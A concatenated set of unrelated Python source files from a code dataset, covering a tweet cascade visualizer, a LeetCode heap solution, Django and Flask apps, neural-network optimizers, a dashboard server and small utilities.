self.root_tweet_id = root_tweet_id # Tweet ID with ROOT Keyword (May updated)
self.root_user_id = 0
self.cascade_path = cascade_path
self.label = label
self.network = nx.DiGraph()
self.load_cascade()
# -----------------
# Calculate Cascade
# -----------------
self.src_user_count = None
self.dst_user_count = None
self.avg_depth = 0
self.max_depth = 0
def load_cascade(self):
with open(self.cascade_path, 'r') as file:
# ---- -----------------
# Set Root: User, Tweet
# ---------------------
for index, line in enumerate(file):
elem_list = [x.strip() for x in re.split(r"[\'\,\->\[\]]", line.strip()) if x.strip()]
if elem_list[0] == 'ROOT' and elem_list[1] == 'ROOT':
self.root_user_id = elem_list[3]
if index != 0:
print('ROOT TWEET {} by {} @ line # {}'.format(elem_list[4], self.root_user_id, index))
break
if self.root_tweet_id != elem_list[4]: # Assert file_id == root_tweet_id
print('\t file_id:{1} -> root_tweet_id:{2} ({0}) '.format(self.label, self.root_tweet_id, elem_list[4]))
self.root_tweet_id = elem_list[4]
# ------------
# Load Cascade
# ------------
for index, line in enumerate(file): # Trace
elem_list = re.split(r"[\'\,\->\[\]]", line.strip())
elem_list = [x.strip() for x in elem_list if x.strip()] # Remove empty elements
# Error data handling
if float(elem_list[2]) >= float(elem_list[5]):
continue
src_user_id, src_tweet_id, src_tweet_time, dst_user_id, dst_tweet_id, dst_tweet_time = elem_list
weight = float(dst_tweet_time) - float(src_tweet_time)
self.network.add_weighted_edges_from([(src_user_id, dst_user_id, 1/weight)])
# =============================
# Structural Analysis
# =============================
def plot_circular_tree(self):
# import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
G = self.network
label = self.label
pos = graphviz_layout(G, prog='twopi', args='')
if label == 'true':
nc = 'blue'
elif label == 'false':
nc = 'red'
elif label == 'unverified':
nc = 'yellow'
elif label == 'non-rumor':
nc = 'green'
else:
nc = 'black'
nx.draw(G, pos, node_size=20, alpha=0.5, node_color=nc, with_labels=False)
out_dir_path = PLOTS_OUT_PATH + 'circular_tree_plot/'
ensure_directory(out_dir_path)
plt.savefig(out_dir_path + str(self.root_tweet_id) + ".png")
plt.clf()
def plot_diff_network(self):
from networkx.drawing.nx_agraph import graphviz_layout
G = self.network
label = self.label
# pos = graphviz_layout(G, prog='twopi', args='')
pos = nx.spring_layout(G, weight='weight')
if label == 'true':
nc = 'blue'
elif label == 'false':
nc = 'red'
elif label == 'unverified':
nc = 'yellow'
elif label == 'non-rumor':
nc = 'green'
else:
nc = 'black'
nx.draw(G, pos, node_size=20, alpha=0.5, node_color=nc, with_labels=False)
nx.draw_networkx_edge_labels(G, pos)
out_dir_path = PLOTS_OUT_PATH + 'diff_network_plot_2/'
ensure_directory(out_dir_path)
plt.savefig(out_dir_path + str(self.root_tweet_id) + ".png")
plt.clf()
# TODO: Class Inheritance
class CascadeAnalyzer(object):
feature_df = pd.DataFrame() # output
def __init__(self):
self.meta_df = pd.DataFrame() # labels / key: root_tweet_id
self.cascades_dict = {} # key: root_tweet_id, value: Cascade()
self.retrieve_cascade_labels()
self.load_cascades()
def retrieve_cascade_labels(self):
column_names = ['label', 'tweet_id']
self.meta_df = pd.read_csv(DATA_PATH + "label.txt", sep=':', names=column_names, converters={'tweet_id': str})
print("-------------------------------------" * 2)
print(self.meta_df.shape, self.meta_df['label'].value_counts().to_dict())
print("-------------------------------------" * 2)
def load_cascades(self):
# TODO: handle pickle data
# iterate tweet trees
for index, file in enumerate(os.listdir(DATA_PATH + 'tree_u')):
if not file.endswith('.txt'):
print("Unexpected Input File:", file)
continue
root_tweet_id = file.replace('.txt', '') # file_id
cascade_path = os.path.join(DATA_PATH + 'tree_u', file)
label = self.meta_df.loc[self.meta_df['tweet_id'] == root_tweet_id, 'label'].item() # label
self.cascades_dict[root_tweet_id] = Cascade(root_tweet_id, cascade_path, label)
# Main Outer loop
def iterate_cascades(self):
for index, row in self.meta_df.iterrows():
tweet_id = row['tweet_id']
cascade = self.cascades_dict[tweet_id]
print('#', index, row['tweet_id'], row['label'])
# cascade.plot_circular_tree()
cascade.plot_diff_network()
def main():
# CascadeAnalyzer -> Overall / Cascade -> Individual
analyzer = CascadeAnalyzer()
analyzer.iterate_cascades()
# Rumor Diffusion Analysis Project
# https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-no_retweets-ids
print("===============================")
print(" Network Visualization ")
print("===============================\n\n")
if __name__ == '__main__':
start_time = time.time() # Timer Start
main()
print("\nElapsed Time: {0} seconds".format(round(time.time() - start_time, 3))) # Execution time
| StarcoderdataPython |
4809086 | <reponame>JulyKikuAkita/PythonPrac
__source__ = 'https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/kth-smallest-element-in-a-sorted-matrix.py
# Time: O(k * log(min(n, m, k))), with n x m matrix
# Space: O(min(n, m, k))
#
# Description: Leetcode # 378. Kth Smallest Element in a Sorted Matrix
#
# Given a n x n matrix where each of the rows and
# columns are sorted in ascending order,
# find the kth smallest element in the matrix.
#
# Note that it is the kth smallest element in the sorted order,
# not the kth distinct element.
#
# Example:
#
# matrix = [
# [ 1, 5, 9],
# [10, 11, 13],
# [12, 13, 15]
# ],
# k = 8,
#
# return 13.
# Note:
# You may assume k is always valid, 1 <= k <= n^2.
#
# Companies
# Google Twitter
# Related Topics
# Binary Search Heap
# Similar Questions
# Find K Pairs with Smallest Sums Kth Smallest Number in Multiplication Table
#
import unittest
from heapq import heappush, heappop
# 136ms 27.62%
class Solution(object):
def kthSmallest(self, matrix, k):
"""
:type matrix: List[List[int]]
:type k: int
:rtype: int
"""
kth_smallest = 0
min_heap = []
def push(i, j):
if len(matrix) > len(matrix[0]):
if i < len(matrix[0]) and j < len(matrix):
heappush(min_heap, [matrix[j][i], i, j])
else:
if i < len(matrix) and j < len(matrix[0]):
heappush(min_heap, [matrix[i][j], i, j])
push(0, 0)
while min_heap and k > 0:
kth_smallest, i, j = heappop(min_heap)
push(i, j + 1)
if j == 0:
push(i + 1, 0)
k -= 1
return kth_smallest
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
#
# https://discuss.leetcode.com/topic/52948/share-my-thoughts-and-clean-java-code
Solution 1 : Heap
Here is the step of my solution:
Build a minHeap of elements from the first row.
Do the following operations k-1 times :
Every time when you poll out the root(Top Element in Heap),
you need to know the row number and column number of that element(so we can create a tuple class here),
replace that root with the next element from the same column.
After you finish this problem, thinks more :
For this question, you can also build a min Heap from the first column, and do the similar operations as above.
(Replace the root with the next element from the same row)
What is more, this problem is exact the same with Leetcode373 Find K Pairs with Smallest Sums,
I use the same code which beats 96.42%, after you solve this problem, you can check with this link:
https://discuss.leetcode.com/topic/52953/share-my-solution-which-beat-96-42
# 24ms 41.99%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int n = matrix.length;
PriorityQueue<Tuple> pq = new PriorityQueue<Tuple>();
for (int j = 0; j <= n - 1; j++) {
pq.offer(new Tuple(0, j, matrix[0][j]));
}
for (int i = 0; i < k - 1; i++) {
Tuple t = pq.poll();
if (t.x == n - 1) continue;
pq.offer(new Tuple(t.x+1, t.y, matrix[t.x+1][t.y]));
}
return pq.poll().val;
}
class Tuple implements Comparable<Tuple> {
int x, y, val;
public Tuple(int x, int y, int val) {
this.x = x;
this.y = y;
this.val = val;
}
@Override
public int compareTo(Tuple that) {
return this.val - that.val; //minHeap
}
}
}
Solution 2 : Binary Search
We are done here, but let's think about this problem in another way:
The key point for any binary search is to figure out the "Search Space".
For me, I think there are two kind of "Search Space" --
index and range(the range from the smallest number to the biggest number).
Most usually, when the array is sorted in one direction,
we can use index as "search space",
when the array is unsorted and we are going to find a specific number, we can use "range".
Let me give you two examples of these two "search space"
index -- A bunch of examples -- https://leetcode.com/problems/find-minimum-in-rotated-sorted-array/
( the array is sorted)
range -- https://leetcode.com/problems/find-the-duplicate-number/ (Unsorted Array)
The reason why we did not use index as "search space"
for this problem is the matrix is sorted in two directions,
we can not find a linear way to map the number and its index.
# 1ms 85.42%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int lo = matrix[0][0], hi = matrix[matrix.length - 1][matrix[0].length - 1] + 1;//[lo, hi)
while(lo < hi) {
int mid = lo + (hi - lo) / 2;
int count = 0, j = matrix[0].length - 1;
for(int i = 0; i < matrix.length; i++) {
while(j >= 0 && matrix[i][j] > mid) j--;
count += (j + 1);
}
if(count < k) lo = mid + 1;
else hi = mid;
}
return lo;
}
}
# 0ms 100%
class Solution {
public int kthSmallest(int[][] matrix, int k) {
int m = matrix.length;
int n = matrix[0].length;
int lower = matrix[0][0];
int upper = matrix[m-1][n-1];
while (lower < upper) {
int mid = lower + (upper - lower) / 2;
int count = count(matrix, mid);
if (count < k) {
lower = mid + 1;
} else {
upper = mid;
}
}
return upper;
}
public int count(int[][] matrix, int target) {
int count = 0;
int j = matrix[0].length - 1;
for (int i = 0; i < matrix.length; i++) {
while(j >= 0 && matrix[i][j] > target) j--;
count += (j + 1);
}
return count;
}
}
''' | StarcoderdataPython |
130588 | # urls.py
from __future__ import absolute_import
from django.conf.urls import include, url
from haystack.generic_views import SearchView
from haystack.forms import SearchForm
from .views import MySearchView
import cloud_notes.views
# required to set an app name to resolve 'url' in templates with namespacing
app_name = "cloud_notes"
urlpatterns = [
url(r'^$', cloud_notes.views.list),
url(r'^new/', cloud_notes.views.new_note),
url(r'^preview/(\d+)', cloud_notes.views.preview),
url(r'^edit/(\d+)', cloud_notes.views.edit_note),
url(r'^trash/(\d+)', cloud_notes.views.trash_note),
url(r'^empty_trash/', cloud_notes.views.empty_trash),
url(r'^delete/(\d+)', cloud_notes.views.delete_note),
url(r'^upload/', cloud_notes.views.upload_note),
url(r'^export/', cloud_notes.views.export),
url(r'^export_all/', cloud_notes.views.export_all),
url(r'^import/', cloud_notes.views.import_file),
url(r'^import_all/', cloud_notes.views.import_all),
url(r'^folders/', cloud_notes.views.folders),
url(r'^hash_tags/', cloud_notes.views.hash_tags),
url(r'^download/(\d+)', cloud_notes.views.download),
url(r'^search/', cloud_notes.views.MySearchView.as_view(form_class = SearchForm), name='search_view'),
]
| StarcoderdataPython |
4805296 | # -*- coding: utf-8 -*-
from flask_pymongo import PyMongo
mongo = PyMongo() | StarcoderdataPython |
1615755 | from running_modes.reinforcement_learning.configurations.learning_strategy_configuration import LearningStrategyConfiguration
from running_modes.reinforcement_learning.learning_strategy import BaseLearningStrategy
from running_modes.reinforcement_learning.learning_strategy import DAPStrategy
from running_modes.reinforcement_learning.learning_strategy import LearningStrategyEnum
from running_modes.reinforcement_learning.learning_strategy import MASCOFStrategy
from running_modes.reinforcement_learning.learning_strategy import MAULIStrategy
from running_modes.reinforcement_learning.learning_strategy import SDAPStrategy
class LearningStrategy:
def __new__(cls, critic_model, optimizer, configuration: LearningStrategyConfiguration, logger=None) \
-> BaseLearningStrategy:
learning_strategy_enum = LearningStrategyEnum()
if learning_strategy_enum.DAP == configuration.name:
return DAPStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.MAULI == configuration.name:
return MAULIStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.MASCOF == configuration.name:
return MASCOFStrategy(critic_model, optimizer, configuration, logger)
if learning_strategy_enum.SDAP == configuration.name:
return SDAPStrategy(critic_model, optimizer, configuration, logger)
| StarcoderdataPython |
1623273 | import graphene
class AuthInfoField(graphene.ObjectType):
message = graphene.String()
| StarcoderdataPython |
3323274 | # Testing DPSS codes.
import multitaper.mtspec as mtspec
import multitaper.utils as utils
import numpy as np
import matplotlib.pyplot as plt
npts = 100
nw = 4.0
kspec = 7
dpss, v = utils.dpss2(npts,nw,kspec)
dpss1, v1 = utils.dpss(npts,nw,kspec)
print(v, v1)
plt.figure()
plt.plot(dpss[:,0],'k')
plt.plot(dpss[:,3],'k')
plt.plot(dpss[:,6],'k')
#plt.plot(dpss1,'r--')
plt.show()
| StarcoderdataPython |
1681209 | <reponame>vladdez/multilayer_perceptron
import numpy as np
import copy
class Optimizer:
def __init__(self, params, lr):
self.params = params
self.lr = lr
def action(self, iter_num):
raise NotImplementedError
class SGD(Optimizer):
def __init__(self, params, lr):
super().__init__(params, lr)
self.params = params
self.lr = lr
def action(self, iter_num):
for layer in self.params:
layer.weights -= self.lr * layer.w_grad
layer.biases -= self.lr * layer.b_grad
class Momentum(Optimizer):
def __init__(self, params, learning_rate):
super().__init__(params, learning_rate)
self.model_params = params
self.lr = learning_rate
self.momentum = 0.99
self.w_velocities = {i: np.zeros_like(self.model_params[i].weights) for i in
range(len(self.model_params))}
self.b_velocities = {i: np.zeros_like(self.model_params[i].biases) for i in
range(len(self.model_params))}
def action(self, iter_num):
for index, layer in enumerate(self.model_params):
self.w_velocities[index] = self.momentum * self.w_velocities[index] + \
self.lr * layer.w_grad
self.b_velocities[index] = self.momentum * self.b_velocities[index] + \
self.lr * layer.b_grad
layer.weights -= self.w_velocities[index]
layer.biases -= self.b_velocities[index]
"""
Adaptive momemtum optimizer
https://arxiv.org/pdf/1412.6980.pdf
https://habr.com/ru/post/318970/
"""
class Adam(Optimizer):
def __init__(self, params, learning_rate, betas=(0.9, 0.999), eps=1e-8):
super().__init__(params, learning_rate)
self.model_params = params
self.lr = learning_rate
self.betas = betas
self.eps = eps
params_len = len(self.model_params)
self.w_m = {i: np.zeros_like(self.model_params[i].weights) for i in range(params_len)}
self.b_m = {i: np.zeros_like(self.model_params[i].biases) for i in range(params_len)}
self.w_v = copy.deepcopy(self.w_m)
self.b_v = copy.deepcopy(self.b_m)
def action(self, iter_num):
for index, layer in enumerate(self.model_params):
self.w_m[index] = self.betas[0] * self.w_m[index] + (1. - self.betas[0]) * layer.w_grad
self.b_m[index] = self.betas[0] * self.b_m[index] + (1. - self.betas[0]) * layer.b_grad
self.w_v[index] = self.betas[1] * self.w_v[index] + (1. - self.betas[1]) * layer.w_grad ** 2
self.b_v[index] = self.betas[1] * self.b_v[index] + (1. - self.betas[1]) * layer.b_grad ** 2
w_m_hat = self.w_m[index] / (1. - self.betas[0] ** iter_num)
b_m_hat = self.b_m[index] / (1. - self.betas[0] ** iter_num)
w_v_hat = self.w_v[index] / (1. - self.betas[1] ** iter_num)
b_v_hat = self.b_v[index] / (1. - self.betas[1] ** iter_num)
layer.weights -= self.lr * w_m_hat / (np.sqrt(w_v_hat) + self.eps)
layer.biases -= self.lr * b_m_hat / (np.sqrt(b_v_hat) + self.eps)
| StarcoderdataPython |
117459 | import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
import numpy as np
def exponential(x, a, b):
return a * b**x
def get_curve_pars(d20, d21):
year = np.linspace(1, 120, num=120)
temp_20 = np.linspace(0, d20*100, num=100)
temp_21 = np.linspace(d20*101, d20*100 + d21*20, num=20)
temp = np.concatenate((temp_20, temp_21), axis=None)
# print(temp)
# plt.plot(year, temp)
(param, cov) = curve_fit(exponential, year, temp, p0=[0.1, 1.05])
# print(param)
perr = np.sqrt(np.diag(cov))
fit = exponential(year, param[0], param[1])
# plt.plot(year, temp, 'r-', year, fit, 'b')
# plt.show()
return [param, perr]
# param, perr = get_curve_pars(0.019, 0.036)
# print(param)
| StarcoderdataPython |
111118 | import ast, collections, dis, types, sys
from functools import reduce
from itertools import chain
from check_subset import check_conformity
def Instruction(opcode, arg):
return bytes([opcode] if arg is None else [opcode, arg % 256, arg // 256])
def concat(assemblies): return b''.join(assemblies)
def SetLineNo(lineno): return b''
def make_lnotab(assembly): return 1, b''
def plumb_depths(assembly): return 10
def assemble(assembly): return assembly
def denotation(opcode):
if opcode < dis.HAVE_ARGUMENT:
return Instruction(opcode, None)
else:
return lambda arg: Instruction(opcode, arg)
op = type('op', (), dict([(name, denotation(opcode))
for name, opcode in dis.opmap.items()]))
def make_table():
table = collections.defaultdict(lambda: len(table))
return table
def collect(table):
return tuple(sorted(table, key=table.get))
def run(filename, module_name):
f = open(filename)
source = f.read()
f.close()
return module_from_ast(module_name, filename, ast.parse(source))
def module_from_ast(module_name, filename, t):
code = code_for_module(module_name, filename, t)
module = types.ModuleType(module_name, ast.get_docstring(t))
exec(code, module.__dict__)
return module
def code_for_module(module_name, filename, t):
return CodeGen(filename, StubScope()).compile_module(t, module_name)
class StubScope: freevars, cellvars, derefvars = (), (), ()
class CodeGen(ast.NodeVisitor):
def __init__(self, filename, scope):
self.filename = filename
self.scope = scope
self.constants = make_table()
self.names = make_table()
self.varnames = make_table()
def compile_module(self, t, name):
assembly = self(t.body) + self.load_const(None) + op.RETURN_VALUE
return self.make_code(assembly, name, 0)
def make_code(self, assembly, name, argcount):
kwonlyargcount = 0
nlocals = len(self.varnames)
stacksize = plumb_depths(assembly)
flags = ( (0x02 if nlocals else 0)
| (0x10 if self.scope.freevars else 0)
| (0x40 if not self.scope.derefvars else 0))
firstlineno, lnotab = make_lnotab(assembly)
return types.CodeType(argcount, kwonlyargcount,
nlocals, stacksize, flags, assemble(assembly),
self.collect_constants(),
collect(self.names), collect(self.varnames),
self.filename, name, firstlineno, lnotab,
self.scope.freevars, self.scope.cellvars)
def __call__(self, t):
if isinstance(t, list): return concat(map(self, t))
assembly = self.visit(t)
return SetLineNo(t.lineno) + assembly if hasattr(t, 'lineno') else assembly
def generic_visit(self, t):
raise NotImplementedError()
def load_const(self, constant):
return op.LOAD_CONST(self.constants[constant, type(constant)])
def collect_constants(self):
return tuple([constant for constant,_ in collect(self.constants)])
def visit_NameConstant(self, t): return self.load_const(t.value) # for None/True/False
def visit_Num(self, t): return self.load_const(t.n)
def visit_Str(self, t): return self.load_const(t.s)
visit_Bytes = visit_Str
def visit_Name(self, t):
if isinstance(t.ctx, ast.Load): return self.load(t.id)
elif isinstance(t.ctx, ast.Store): return self.store(t.id)
else: assert False
def load(self, name): return op.LOAD_NAME(self.names[name])
def store(self, name): return op.STORE_NAME(self.names[name])
def visit_Call(self, t):
assert len(t.args) < 256 and len(t.keywords) < 256
return (self(t.func) + self(t.args) + self(t.keywords)
+ op.CALL_FUNCTION((len(t.keywords) << 8) | len(t.args)))
def visit_keyword(self, t):
return self.load_const(t.arg) + self(t.value)
def visit_Expr(self, t):
return self(t.value) + op.POP_TOP
def visit_Assign(self, t):
def compose(left, right): return op.DUP_TOP + left + right
return self(t.value) + reduce(compose, map(self, t.targets))
if __name__ == '__main__':
sys.argv.pop(0)
run(sys.argv[0], '__main__')
| StarcoderdataPython |
3253586 | from ..base import ShopifyResource
class ProductSearchEngine(ShopifyResource):
pass
| StarcoderdataPython |
8956 | import json
from django.contrib.auth.models import User
from django.http import JsonResponse
from django.shortcuts import redirect, render
from .models import Game2048
# Create your views here.
# test_user
# 8!S#5RP!WVMACg
def game(request):
return render(request, 'game_2048/index.html')
def set_result(request):
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'POST':
# Get the game state from the POST request
game_state = request.body
obj = Game2048.objects.get(user=user)
# Check if the game state idendical to the server game state
if game_state != obj.game_state:
# let string to JSON object
json_game_state = json.loads(game_state)
# extract value of best from JSON objest
obj.best_score = json_game_state['best']
obj.game_state = json_game_state # save JSON object to game_state
obj.save()
else:
return redirect('game_2048:game')
return JsonResponse("", safe=False)
def get_result(request):
# Check if user is logged in if not set user to test_user
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'GET':
obj, created = Game2048.objects.get_or_create(user=user)
game_state = obj.game_state
return JsonResponse(game_state, safe=False)
| StarcoderdataPython |
84778 | <filename>read_ims_legacy.py
def read_ims_legacy(name):
data = {}
dls = []
#should read in .tex file
infile = open(name + ".tex")
instring = infile.read()
##instring = instring.replace(':description',' :citation') ## to be deprecated soon
instring = unicode(instring,'utf-8')
meta = {}
metatxt = instring.split('::')[1]
meta['record_txt'] = '::' + metatxt.strip() + '\n\n'
meta['bibtype'],rest= metatxt.split(None,1)
meta['id'],rest= rest.split(None,1)
rest = '\n' + rest.strip()
secs = rest.split('\n:')[1:]
for sec in secs:
k,v = sec.split(None,1)
meta[k] = v
data['metadata'] = meta
for x in instring.split('::person')[1:]:
x = x.split('\n::')[0]
d = {}
d['record_txt'] = '::person ' + x.strip() + '\n'
lines = d['record_txt'].split('\n')
lines = [line for line in lines if not line.find('Email') >= 0 ]
pubrecord = '\n'.join(lines) + '\n'
d['public_record_txt'] = break_txt(pubrecord,80)
secs = x.split('\n:')
toplines = secs[0].strip()
d['id'], toplines = toplines.split(None,1)
try: name,toplines = toplines.split('\n',1)
except:
name = toplines
toplines = ''
d['complete_name'] = name
#d['link_lines'] = toplines
d['link_ls'] = lines2link_ls(toplines)
for sec in secs[1:]:
words = sec.split()
key = words[0]
if len(words) > 1:
val = sec.split(None,1)[1] ## keep newlines
else: val = ''
if d.has_key(key): d[key] += [val]
else: d[key] = [val]
d['Honor'] = [ read_honor(x) for x in d.get('Honor',[]) ]
d['Degree'] = [ read_degree(x) for x in d.get('Degree',[]) ]
d['Education'] = [ read_education(x) for x in d.get('Education',[]) ]
d['Service'] = [ read_service(x) for x in d.get('Service',[]) ]
d['Position'] = [ read_position(x) for x in d.get('Position',[]) ]
d['Member'] = [ read_member(x) for x in d.get('Member',[]) ]
d['Image'] = [ read_image(x) for x in d.get('Image',[]) ]
d['Homepage'] = [ read_homepage(x) for x in d.get('Homepage',[]) ]
for k in bio_cat_order:
#d['Biography'] = [ read_bio(x) for x in d.get('Biography',[]) ]
d[k] = [ read_bio(x) for x in d.get(k,[]) ]
dls += [d]
links_txt = instring.split('::links',1)[1].split('\n::')[0]
data['link_ls'] = links_txt2ls(links_txt)
data['records'] = dls
books = instring.split('::book')[1:]
book_dict = {}
for b in books:
b = 'book' + b
d = read_book(b)
del d['top_line']
book_dict[ d['id'] ] = d
data['books'] = book_dict
links_txt = instring.split('::links',1)[1].split('\n::')[0]
data['link_ls'] = links_txt2ls(links_txt)
return data | StarcoderdataPython |
80097 | import flask
app = flask.Flask(__name__)
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
from flask.ext.babel import Babel
babel = Babel(app)
from flask import render_template
from flask.ext.babel import gettext as _, ngettext
@babel.localeselector
def get_locale():
return 'fr'
@app.route("/")
def index():
brittany = _('Brittany')
france = _('France')
return render_template('index.html',
some_text=_("I am a sausage."),
best_part=_("%(part)s is the best part of %(country)s.", part=brittany, country=france),
singular=ngettext('I bought a garlic glove this morning.', 'I bought %(num)d garlic gloves this morning.', 1),
plural=ngettext('I bought a garlic glove this morning.', 'I bought %(num)d garlic gloves this morning.', 42))
if __name__ == "__main__":
app.run(host="0.0.0.0")
| StarcoderdataPython |
3221895 | <reponame>unstad/jarvis2<filename>jarvis/app.py
# -*- coding: utf-8 -*-
import json
import logging
import os
try:
import queue
except ImportError:
import Queue as queue
try:
import socketserver
except ImportError:
import SocketServer as socketserver
from apscheduler.schedulers.background import BackgroundScheduler
from datetime import datetime, timedelta
from flask import Flask, render_template, Response, request, abort, jsonify
from flask_assets import Environment, Bundle
from flask.templating import TemplateNotFound
from jobs import load_jobs
from random import randint
app = Flask(__name__)
app.logger.setLevel(logging.INFO)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
sched = BackgroundScheduler(logger=app.logger)
queues = {}
last_events = {}
@app.before_first_request
def _configure_bundles():
js = ["main.js"]
css = ["main.css"]
widgets_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "static", "widgets")
)
for widget in os.listdir(widgets_path):
widget_path = os.path.join("widgets", widget)
for asset_file in os.listdir(os.path.join(widgets_path, widget)):
asset_path = os.path.join(widget_path, asset_file)
if asset_file.endswith(".js"):
js.append(asset_path)
elif asset_file.endswith(".css"):
css.append(asset_path)
assets = Environment(app)
if app.debug:
assets.register("js_all", Bundle(*js, output="gen/app.js"))
assets.register("css_all", Bundle(*css, output="gen/styles.css"))
else:
assets.register(
"js_min_all", Bundle(*js, filters="rjsmin", output="gen/app.min.js")
)
assets.register(
"css_min_all", Bundle(*css, filters="cssmin", output="gen/styles.min.css")
)
@app.route("/w/<job_id>")
@app.route("/widget/<job_id>")
def widget(job_id):
if not _is_enabled(job_id):
abort(404)
x = request.args.get("x", 3)
widgets = _enabled_jobs()
# Use the widget matching the job implementation, or an explicitly declared
# widget
job = _config()["JOBS"][job_id]
widget = job.get("job_impl", job_id)
widget = job.get("widget", widget)
return render_template(
"index.html",
layout="layout_single.html",
widget=widget,
job=job_id,
x=x,
widgets=widgets,
)
@app.route("/")
@app.route("/d/<layout>")
@app.route("/dashboard/<layout>")
def dashboard(layout=None):
locale = request.args.get("locale")
widgets = _enabled_jobs()
layout = layout or _config().get("DEFAULT_LAYOUT")
if layout is None:
return render_template("index.html", locale=locale, widgets=widgets)
try:
return render_template(
"index.html",
layout="layouts/{0}.html".format(layout),
locale=locale,
widgets=widgets,
)
except TemplateNotFound:
abort(404)
@app.route("/widgets")
def widgets():
return jsonify(_enabled_jobs())
@app.route("/events")
def events():
remote_port = request.environ["REMOTE_PORT"]
current_queue = queue.Queue()
queues[remote_port] = current_queue
for event in last_events.values():
current_queue.put(event)
def consume():
while True:
data = current_queue.get()
if data is None:
break
yield "data: %s\n\n" % (data,)
response = Response(consume(), mimetype="text/event-stream")
response.headers["X-Accel-Buffering"] = "no"
return response
@app.route("/events/<job_id>", methods=["POST"])
def create_event(job_id):
if not _is_enabled(job_id):
abort(404)
body = request.get_json()
if not body:
abort(400)
_add_event(job_id, body)
return "", 201
def _config():
if app.testing: # tests set their own config
return app.config
app.config.from_envvar("JARVIS_SETTINGS")
return app.config
def _enabled_jobs():
config = _config()["JOBS"]
return [job_id for job_id in config.keys() if config[job_id].get("enabled")]
def _is_enabled(job_id):
return job_id in _enabled_jobs()
@app.context_processor
def _inject_template_methods():
return dict(is_job_enabled=_is_enabled)
@app.after_request
def _set_security_headers(response):
csp = (
"default-src 'none'; "
"connect-src 'self'; "
"img-src 'self' https://i.scdn.co; "
"script-src 'self' https://cdnjs.cloudflare.com; "
"style-src 'self' https://cdnjs.cloudflare.com https://fonts.googleapis.com; "
"font-src https://fonts.gstatic.com"
)
response.headers["Content-Security-Policy"] = csp
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["X-XSS-Protection"] = "1; mode=block"
return response
@app.before_first_request
def _schedule_jobs():
offset = 0
jobs = load_jobs()
for job_id, job_config in _config()["JOBS"].items():
job_impl = job_config.get("job_impl", job_id)
if not job_config.get("enabled"):
app.logger.info("Skipping disabled job: %s", job_id)
continue
if job_impl not in jobs:
app.logger.info(
("Skipping job with ID %s (no such " "implementation: %s)"),
job_id,
job_impl,
)
continue
job = jobs[job_impl](job_config)
if app.debug:
start_date = datetime.now() + timedelta(seconds=1)
else:
offset += randint(4, 10)
start_date = datetime.now() + timedelta(seconds=offset)
job.start_date = start_date
app.logger.info(
"Scheduling job with ID %s (implementation: %s): %s", job_id, job_impl, job
)
sched.add_job(
_run_job,
"interval",
name=job_id,
next_run_time=job.start_date,
coalesce=True,
seconds=job.interval,
kwargs={"job_id": job_id, "job": job},
)
if not sched.running:
sched.start()
def _add_event(job_id, data):
json_data = json.dumps(
{"body": data, "job": job_id}, separators=(",", ":"), sort_keys=True
)
last_events[job_id] = json_data
for q in queues.values():
q.put(json_data)
def _run_job(job_id, job):
try:
data = job.get()
_add_event(job_id, data)
except Exception as e:
app.logger.warning("Failed to execute job: " + job_id + ": " + str(e))
def _close_stream(*args, **kwargs):
remote_port = args[2][1]
if remote_port in queues:
del queues[remote_port]
socketserver.BaseServer.handle_error = _close_stream
| StarcoderdataPython |
92562 |
import sys, json, requests, wget
#import urllib2 import urlopen, URLError, HTTPError
def clientbundle():
pass
url="https://ec2-54-183-194-88.us-west-1.compute.amazonaws.com/auth/login"
data = dict(username='docker', password='<PASSWORD>')
r = requests.post(url, json=data, verify=False)
auth_token = json.loads(r.content)["auth_token"]
headers = { 'Authorization': 'Bearer + ' + auth_token }
ucp_api = "https://ec2-54-183-194-88.us-west-1.compute.amazonaws.com/api/clientbundle"
target_path = 'bundle.zip'
handle = open(target_path, "wb")
response = requests.get(ucp_api, headers=headers, stream=True, verify=False)
for chunk in response.iter_content(chunk_size=512):
if chunk: # filter out keep-alive new chunks
handle.write(chunk)
handle.close()
#wget.download(url)
| StarcoderdataPython |
3228021 | <reponame>Valmarelox/auto_struct
from struct import Struct
from typing import Optional, Sequence, Any
from auto_struct.exceptions.type import ElementCountException
def create_struct(fmt: str) -> Struct:
return Struct('=' + fmt.replace('=', ''))
class BaseTypeMeta(type):
FORMAT = None
@property
def struct(cls) -> Optional[Struct]:
if cls.FORMAT:
return create_struct(cls.FORMAT)
return None
def __len__(self) -> int:
return self.struct.size
class BaseType(metaclass=BaseTypeMeta):
"""
BasicType the entire module inherits, allows automatic packing and unpacking of datatypes
"""
@classmethod
def parse(cls, data: bytes):
if len(cls) != len(data):
raise ElementCountException(f'{cls.__name__} received {len(data)} elements, expected: {len(cls)}')
return cls(*cls.struct.unpack(data))
@classmethod
def element_count(cls) -> int:
return 1
@classmethod
def _rec_element_count(cls):
return cls.element_count()
@classmethod
def build_tuple_tree(cls, values) -> Sequence[Any]:
if len(values) != 1:
raise ElementCountException(f'{cls.__name__} received {len(values)} elements, expected: 1')
return values
def __hash__(self):
return hash(self._rec_element_count()) + hash(type(self))
@property
def struct(self):
return type(self).struct
def __len__(self):
return len(type(self))
| StarcoderdataPython |
1603763 | <gh_stars>1-10
import os
from random import shuffle
from utils.file_functions import get_subfolder_names
from archive.loader_archive.XSensRecordingReader import XSensRecordingReader
import pandas as pd
import utils.settings as settings
from utils.Recording import Recording
def load_dataset(dataset_path: str) -> "list[Recording]":
"""
Returns a list of the raw recordings (activities, subjects included, None values) (different representaion of dataset)
